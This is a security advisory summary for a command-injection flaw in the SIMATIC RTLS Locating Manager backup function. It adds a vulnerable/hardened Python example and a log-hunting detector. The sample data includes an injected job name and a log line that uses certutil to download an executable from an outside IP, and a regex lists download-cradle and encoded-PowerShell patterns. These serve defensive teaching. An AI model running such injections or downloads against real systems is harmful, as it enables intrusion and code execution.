Full Report
SIMATIC RTLS Locating Manager before V3.2 contains an improper input validation vulnerability that could allow an authenticated remote attacker to execute arbitrary code with high privileges. Siemens has released a new version of SIMATIC RTLS Locating Manager and recommends updating to the latest version.
Analysis Summary
# Vulnerability: Arbitrary Code Execution in SIMATIC RTLS Locating Manager via Improper Input Validation
## CVE Details
- CVE ID: CVE-2025-40746
- CVSS Score: 9.1 (CVSS v3.1) / 9.4 (CVSS v4.0) (Critical)
- CWE: CWE-20: Improper Input Validation
## Affected Systems
- Products: SIMATIC RTLS Locating Manager
- Versions: All versions before V3.2
- Prerequisites: the attacker must hold valid credentials for the application and be able to reach it over the network.
## Vulnerability Description
The affected versions do not properly validate input handed to a backup script within SIMATIC RTLS Locating Manager. An authenticated remote attacker who controls that input can execute arbitrary code with the highest local privilege, NT AUTHORITY\SYSTEM. The attack vector is Network because the backup functionality is reachable through the application's network-facing interface; the need for valid credentials is a separate precondition and does not change that.
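The weakness class, shown as an added illustration that is not code from SIMATIC RTLS Locating Manager (the product's actual backup script is not published on this page): a backup routine running as SYSTEM that splices a caller-supplied job name into a shell command, beside the hardened form that allowlists the name and avoids the shell. The job-name parameter, the `7z.exe` backup tool, the `D:\rtls` directory layout and all function names are assumptions.

```python
# Added example, not product code. Everything below is assumed: the job-name
# parameter, the 7z.exe backup tool, the D:\rtls layout and the function names.
import re
from pathlib import PureWindowsPath

BACKUP_ROOT = PureWindowsPath(r"D:\rtls\backups")   # assumed layout
DATA_DIR = PureWindowsPath(r"D:\rtls\data")         # assumed layout


def build_backup_command_unsafe(job_name: str) -> str:
    """Vulnerable pattern (CWE-20): the caller-supplied job name is spliced
    into a shell command string. Handed to subprocess.run(cmd, shell=True) by
    a service running as NT AUTHORITY\\SYSTEM, any metacharacter in job_name
    becomes a SYSTEM-level command. Returned, not executed, so it stays inert."""
    archive = f'{BACKUP_ROOT}\\{job_name}.7z'
    return f'7z.exe a "{archive}" "{DATA_DIR}"'


# Allowlist: letters, digits, underscore, hyphen, bounded length. No quotes,
# separators, dots or whitespace, so neither shell injection nor path
# traversal (..\) can be expressed by a name that passes.
JOB_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_job_name(job_name: str) -> str:
    """Reject anything that is not a plain job name instead of escaping it."""
    if not JOB_NAME.fullmatch(job_name):
        raise ValueError(f"invalid backup job name: {job_name!r}")
    return job_name


def build_backup_command_safe(job_name: str) -> list[str]:
    """Hardened pattern: validate first, then build an argument vector to be
    passed to subprocess.run(argv) WITHOUT a shell, so nothing re-parses it."""
    name = validate_job_name(job_name)
    archive = BACKUP_ROOT / f"{name}.7z"
    # Belt and braces: the archive must still sit directly under BACKUP_ROOT.
    if archive.parent != BACKUP_ROOT:
        raise ValueError("backup target escaped the backup root")
    return ["7z.exe", "a", str(archive), str(DATA_DIR)]


if __name__ == "__main__":
    hostile = 'site1" & whoami & "'                 # constructed hostile input
    print(build_backup_command_unsafe(hostile))      # a shell would run whoami
    print(build_backup_command_safe("site1"))
    try:
        build_backup_command_safe(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The fix that matters is the pair: an allowlist on the value and an argument vector instead of a shell string. Escaping alone leaves the shell in the loop, and an argument vector alone still lets a crafted name pick the output path.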
## Exploitation
- Status: the summary does not state whether the flaw is exploited in the wild, and no public PoC or exploit details are given.
- Complexity: Low (AC:L); no conditions beyond valid credentials are required.
- Attack Vector: Network (AV:N)
## Impact
The impact is severe due to the ability to execute code with SYSTEM privileges:
- Confidentiality: High (H)
- Integrity: High (H)
- Availability: High (H)
## Remediation
### Patches
- Update SIMATIC RTLS Locating Manager to **Version V3.2 or later**.
- Vendor Reference for update: https://support.industry.siemens.com/cs/ww/en/view/109977124/
### Workarounds
- No product-specific workaround or mitigation is listed; Siemens' general recommendations apply:
1. Protect network access to the devices using appropriate mechanisms.
2. Configure the operational environment according to Siemens' operational guidelines for Industrial Security.
## Detection
- The advisory gives no detection method. Because exploitation is authenticated and ends in SYSTEM-level code execution, practical indicators are:
  - logon and authentication events for the Locating Manager service from unexpected accounts, hosts or times;
  - processes spawned under NT AUTHORITY\SYSTEM by the backup functionality that a normal backup run would not produce, such as unexpected child processes or shell metacharacters and encoded commands in their arguments.
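A hunt for the second indicator, added here as an example and not taken from the advisory or the product: it scans process-creation records for SYSTEM-level children of the backup functionality that do not belong to a normal backup run. It assumes the backup script executes under `powershell.exe` as NT AUTHORITY\SYSTEM and that a clean backup only launches the tools listed in `EXPECTED_BACKUP_CHILDREN`; the records are constructed for this example and only loosely follow the fields of Windows Security event 4688.

```python
# Added example, not from the advisory. The backup host, the expected child
# tools and the log records below are assumptions constructed for the demo.
import re
from dataclasses import dataclass

SYSTEM_ACCOUNT = r"NT AUTHORITY\SYSTEM"
BACKUP_HOST = "powershell.exe"                          # assumed script host
EXPECTED_BACKUP_CHILDREN = {"robocopy.exe", "7z.exe"}   # assumed backup tools

# Argument shapes that have no place in a backup job: command separators,
# subshells, encoded PowerShell and download cradles.
SUSPICIOUS_ARGS = re.compile(
    r"[;&|`]|\$\(|-enc\w*\b|downloadstring|invoke-expression|\biex\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    event_id: int
    subject_user: str     # account the new process runs as
    parent_image: str     # creator process (full path)
    new_process: str      # new process (full path)
    command_line: str


# Constructed records: event_id|user|parent|new_process|command_line
SAMPLE_LOG = r"""
4688|NT AUTHORITY\SYSTEM|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\robocopy.exe|robocopy.exe D:\rtls\data E:\backup\2025-08-12 /MIR
4688|NT AUTHORITY\SYSTEM|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami > C:\Windows\Temp\o.txt
4688|NT AUTHORITY\SYSTEM|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\robocopy.exe|robocopy.exe D:\rtls\data "E:\backup\x & certutil -urlcache -f http://198.51.100.7/a.exe C:\Windows\Temp\a.exe" /MIR
4688|CONTOSO\svc_rtls|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir
4624|NT AUTHORITY\SYSTEM|-|-|-
"""


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the constructed pipe-separated format; a real pipeline would read
    evtx or the SIEM's JSON. The command line is the last field and may itself
    contain '|', hence the split limit."""
    events = []
    for line in text.strip().splitlines():
        event_id, user, parent, new_proc, cmdline = line.split("|", 4)
        events.append(ProcEvent(int(event_id), user, parent, new_proc, cmdline))
    return events


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious(events: list[ProcEvent]) -> list[tuple[ProcEvent, str]]:
    """Flag SYSTEM-level children of the backup host that are either not an
    expected backup tool or are an expected tool with hostile-looking args."""
    hits = []
    for e in events:
        if e.event_id != 4688:
            continue
        if e.subject_user.upper() != SYSTEM_ACCOUNT.upper():
            continue
        if _basename(e.parent_image) != BACKUP_HOST:
            continue
        child = _basename(e.new_process)
        if child not in EXPECTED_BACKUP_CHILDREN:
            hits.append((e, f"unexpected child process {child} under backup host"))
        elif SUSPICIOUS_ARGS.search(e.command_line):
            hits.append((e, "suspicious tokens in arguments of expected backup tool"))
    return hits


if __name__ == "__main__":
    for event, reason in find_suspicious(parse_log(SAMPLE_LOG)):
        print(f"{reason}: {event.command_line}")
```

On a real host the parent filter should be tightened to the actual script host and script path of the Locating Manager backup once they are known, otherwise every SYSTEM-level PowerShell job on the machine is in scope and the rule will be noisy.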
## References
- Vendor Advisory: SSA-493787
- Siemens ProductCERT: https://www.siemens.com/cert/advisories